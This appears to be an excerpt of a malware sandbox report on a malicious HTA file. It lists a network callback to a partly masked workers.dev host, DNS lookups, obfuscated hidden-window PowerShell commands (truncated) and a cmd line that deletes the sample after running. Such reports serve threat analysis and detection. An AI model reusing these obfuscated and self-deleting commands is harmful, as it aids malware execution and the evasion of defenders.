Technical Information
- 'he###.###bxdobr0.workers.dev':443
- DNS ASK google.com
- DNS ASK he###.###bxdobr0.workers.dev
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -nop -c while(!(.("""{0}{1}{2}"""-f ("""{1}{0}""" -f 'st-','Te'),("""{2}{1}{0}""" -f 'ec','onn','C'),("""{1}{0}"""-f'n','tio')) ("""{1}{2}{0}""" -f ("""{0}{1}"""-f("""{1}{0}"""-f'.c','le'),'om'...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c ping 127.0.0.1 -n 1 & DEL "<PATH_SAMPLE>.hta"' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -nop -c while(!(.("""{0}{1}{2}"""-f ("""{1}{0}""" -f 'st-','Te'),("""{2}{1}{0}""" -f 'ec','onn','C'),("""{1}{0}"""-f'n','tio')) ("""{1}{2}{0}""" -f ("""{0}{1}"""-f("""{1}{0}"""-f'.c','le'),'om'...
- '%WINDIR%\syswow64\cmd.exe' /c ping 127.0.0.1 -n 1 & DEL "<PATH_SAMPLE>.hta"
- '%WINDIR%\syswow64\ping.exe' 127.0.0.1 -n 1